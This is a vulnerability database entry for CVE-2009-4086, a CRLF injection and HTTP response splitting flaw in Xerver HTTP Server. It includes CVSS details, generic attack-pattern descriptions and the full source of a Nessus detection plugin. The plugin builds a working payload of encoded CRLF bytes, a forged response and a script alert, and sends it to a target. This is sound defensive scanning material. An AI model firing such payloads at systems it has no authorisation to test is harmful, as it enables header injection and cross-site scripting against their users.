Vulnerabilities > CVE-2009-4086 - Improper Input Validation vulnerability in Javascript Xerver Http Server 4.31/4.32

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
NONE
Integrity impact
PARTIAL
Availability impact
NONE
network
low complexity
javascript
CWE-20
nessus
exploit available

Summary

CRLF injection vulnerability in Xerver HTTP Server 4.31 and 4.32 allows remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via certain byte sequences at the end of a URL. NOTE: some of these details are obtained from third party information.

Vulnerable Configurations

Part Description Count
Application
Javascript
2

Common Weakness Enumeration (CWE)

Common Attack Pattern Enumeration and Classification (CAPEC)

  • Buffer Overflow via Environment Variables
    This attack pattern involves causing a buffer overflow through manipulation of environment variables. Once the attacker finds that they can modify an environment variable, they may try to overflow associated buffers. This attack leverages implicit trust often placed in environment variables.
  • Server Side Include (SSI) Injection
    An attacker can use Server Side Include (SSI) Injection to send code to a web application that then gets executed by the web server. Doing so enables the attacker to achieve similar results to Cross Site Scripting, viz., arbitrary code execution and information disclosure, albeit on a more limited scale, since the SSI directives are nowhere near as powerful as a full-fledged scripting language. Nonetheless, the attacker can conveniently gain access to sensitive files, such as password files, and execute shell commands.
  • Cross Zone Scripting
    An attacker is able to cause a victim to load content into their web-browser that bypasses security zone controls and gain access to increased privileges to execute scripting code or other web objects such as unsigned ActiveX controls or applets. This is a privilege elevation attack targeted at zone-based web-browser security. In a zone-based model, pages belong to one of a set of zones corresponding to the level of privilege assigned to that page. Pages in an untrusted zone would have a lesser level of access to the system and/or be restricted in the types of executable content it was allowed to invoke. In a cross-zone scripting attack, a page that should be assigned to a less privileged zone is granted the privileges of a more trusted zone. This can be accomplished by exploiting bugs in the browser, exploiting incorrect configuration in the zone controls, through a cross-site scripting attack that causes the attackers' content to be treated as coming from a more trusted page, or by leveraging some piece of system functionality that is accessible from both the trusted and less trusted zone. This attack differs from "Restful Privilege Escalation" in that the latter correlates to the inadequate securing of RESTful access methods (such as HTTP DELETE) on the server, while cross-zone scripting attacks the concept of security zones as implemented by a browser.
  • Cross Site Scripting through Log Files
    An attacker may leverage a system weakness where logs are susceptible to log injection to insert scripts into the system's logs. If these logs are later viewed by an administrator through a thin administrative interface and the log data is not properly HTML encoded before being written to the page, the attackers' scripts stored in the log will be executed in the administrative interface with potentially serious consequences. This attack pattern is really a combination of two other attack patterns: log injection and stored cross site scripting.
  • Command Line Execution through SQL Injection
    An attacker uses standard SQL injection methods to inject data into the command line for execution. This could be done directly through misuse of directives such as MSSQL_xp_cmdshell or indirectly through injection of data into the database that would be interpreted as shell commands. Sometime later, an unscrupulous backend application (or could be part of the functionality of the same application) fetches the injected data stored in the database and uses this data as command line arguments without performing proper validation. The malicious data escapes that data plane by spawning new commands to be executed on the host.

Exploit-Db

descriptionXerver 4.31, 4.32 HTTP Response Splitting. CVE-2009-4086. Webapps exploits for multiple platform
idEDB-ID:10170
last seen2016-02-01
modified2009-11-18
published2009-11-18
reporters4squatch
sourcehttps://www.exploit-db.com/download/10170/
titleXerver 4.31 / 4.32 - HTTP Response Splitting

Nessus

NASL familyWeb Servers
NASL idXERVER_HTTP_RESPONSE_SPLITTING.NASL
descriptionThe version of Xerver running on the remote host has an HTTP response splitting vulnerability due to its failure to sanitize specially encoded carriage return and newline characters. A remote attacker could exploit this by tricking a user into requesting a maliciously crafted URL, resulting in the injection of HTTP headers, HTML, or script code.
last seen2020-06-01
modified2020-06-02
plugin id42896
published2009-11-25
reporterThis script is Copyright (C) 2009-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/42896
titleXerver HTTP Response Splitting
code
#
# (C) Tenable Network Security, Inc.
#


include("compat.inc");


if (description)
{
  script_id(42896);
  script_version("1.11");
 script_cvs_date("Date: 2018/08/07 16:46:51");

  script_cve_id("CVE-2009-4086");
  script_bugtraq_id(37064);
  script_xref(name:"Secunia", value:"36681");

  script_name(english:"Xerver HTTP Response Splitting");
  script_summary(english:"Attempts a XSS attack via HTTP response splitting");

  script_set_attribute(attribute:"synopsis", value:"The remote web server has an HTTP response splitting vulnerability.");
  script_set_attribute(
    attribute:"description",
    value:
"The version of Xerver running on the remote host has an HTTP response
splitting vulnerability due to its failure to sanitize specially
encoded carriage return and newline characters.  A remote attacker
could exploit this by tricking a user into requesting a maliciously
crafted URL, resulting in the injection of HTTP headers, HTML, or
script code."
  );
  script_set_attribute(attribute:"see_also", value:"http://www.exploit-db.com/exploits/10170");
  script_set_attribute(attribute:"solution", value:"There is no known solution at this time.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:U/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
 script_cwe_id(20);

  script_set_attribute(attribute:"vuln_publication_date", value:"2009/11/18");
  script_set_attribute(attribute:"plugin_publication_date", value:"2009/11/25");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"Web Servers");

  script_copyright(english:"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.");

  script_require_ports("Services/www", 80);
  script_dependencies("http_version.nasl");
  exit(0);
}


include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("url_func.inc");
include("webapp_func.inc");


port = get_http_port(default:80);

if (report_paranoia < 2)
{
  banner = get_http_banner(port:port);
  if (!isnull(banner) && 'Xerver' >!< banner)
    exit(0, 'The web server on port '+port+' does not appear to be Xerver.');
}

crlf = '%C0%8D%C0%8A';
hdr_name = 'X-' + str_replace(string:SCRIPT_NAME, find:'.', replace:'-');
time = unixtime();
xss = "<script>alert('" + SCRIPT_NAME + '-' + unixtime() + "')</script>";

# Attempt to inject a header and some data
req =
  '/' + crlf +
  'HTTP/1.1 200 OK' + crlf +
  'Content-Length: ' + strlen(xss) + crlf +
  'Content-Type: text/html' + crlf +
  hdr_name + ': ' + time + crlf +
  crlf +
  xss
;

unreserved = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_.!~*()-]%/";
url = urlencode(str:req, unreserved:unreserved);

res = http_send_recv3(method:"GET", item:url, port:port, fetch404:TRUE, exit_on_fail: 1);

headers = parse_http_headers(status_line:res[0], headers:res[1]);
if (isnull(headers)) exit(1, 'Error parsing HTTP headers on port '+port+'.');

# Extract the HTTP header we attempted to inject
injected_hdr = headers[tolower(hdr_name)];
if (isnull(injected_hdr))
  exit(0, 'The web server on port '+port+' did not respond with the header the plugin tried to inject.');

pat = str_replace(string:xss, find:"(", replace:"\(");
pat = str_replace(string:pat, find:")", replace:"\)");

# Check if we were able to successfully inject a header _and_ some script code
if (injected_hdr == time && ereg(string:res[2], pattern:'^' + pat))
{
  set_kb_item(name: 'www/'+port+'/XSS', value: TRUE);

  if (report_verbosity > 0)
  {
    report = get_vuln_report(items:url, port:port);
    security_warning(port:port, extra:report);
  }
  else security_warning(port);
}
else exit(0, 'The web server on port ' + port + ' is not affected.');